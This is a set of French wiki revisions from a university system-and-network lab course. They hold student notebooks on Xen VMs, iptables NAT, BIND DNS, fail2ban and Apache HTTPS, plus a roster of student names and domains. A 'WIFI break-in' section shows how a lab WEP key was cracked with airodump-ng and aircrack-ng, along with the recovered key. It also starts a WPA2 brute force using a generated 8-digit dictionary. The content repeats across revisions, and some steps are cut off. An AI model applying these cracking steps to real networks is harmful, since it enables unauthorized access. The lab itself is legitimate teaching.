</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===

==== premiere partie ====
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

==== Seconde partie ====
On s'interesse maintenant à la kracotte02 via la commande précédente on trouve :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un fichier Python un dictionnaire contenant toutes les possibilités sur 8 chiffres. Pour lancer ce programme on utilise Python3<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Le commande suivante doit être lancée

Enfin on peut lancer la méthode par force brute via la commande suivante

Le résutat peut-être observé via la commande :

2001:660:4401:60a0:216:3eff:fe19:f03c

SE4 IdO sécurité système/réseau 2025/2026

2026-02-10T15:35:06Z

Abiernac :

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|-
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|-
| SE4.Solstice|| <code>193.48.57.167</code>|| Mohamed Salhi
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|pont_rock
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E13-Billel
|22
|-
|E14-Antonin
|23
|-
|E15-MSalhi
|25
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCédric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|-
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E14

2026-02-10T14:46:45Z

Abiernac :

Atelier SysRes SE4 2025/2026 E14

2026-02-10T14:42:26Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

=== Effraction WIFI ===
On travaille sur la zabeth13 parce que cette machine a une carte réseau fonctionnelle pour faire le TP.

La commande suivante permet de d'identifier l'interface WIFI qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlan1

Donc nous pouvons lancer la commande suivante afin d'identifier l'adresse IP de notre cracotte14.<syntaxhighlight lang="bash">
sudo airodump-ng wlan1
</syntaxhighlight>Dans la liste nous avons en effet la cracotte14 sur le channel 4 et l'adresse ip suivante<syntaxhighlight lang="bash">
04:DA:D2:9C:50:5D -62 231 0 0 4 54e. WEP WEP cracotte14
</syntaxhighlight>Enfin nous pouvons lancer la commande<syntaxhighlight lang="bash">
sudo airodump-ng wlan1 --bssid 04:DA:D2:9C:50:5d -c4 --write log_airodump
</syntaxhighlight>Dans notre cas la carte réseau de la zabeth13 disfonctionne. Donc Mr Redon me donne une cléUSB Wifi pour pouvoir travailler. De plus les cracotte s'arrête au 13 donc je dois prendre la cracotte02.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Après un certain temps on peut entrer la commande suivante pour voir si un résultat à été trouvé<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un KEY FOUND !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-10T14:36:21Z

Abiernac :

=== Projet de virtualisation ===

==== Atelier système et réseau, les machines virtuelles ====

===== Création des machines virtuelles =====
Nous avons créé deux machines avec les commandes suivantes :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight><syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight><syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight><syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]

</syntaxhighlight>modif le fichier <code>/etc/fstab</code> :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>sur terminal<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
</syntaxhighlight>ensuite : <syntaxhighlight>
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight><syntaxhighlight lang="bash">
auto eth0
iface eth0 inet static
address 172.10.0.1/24

auto eth1
iface eth1 inet static
address 193.48.57.169/27
gateway 193.48.57.162

</syntaxhighlight>accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
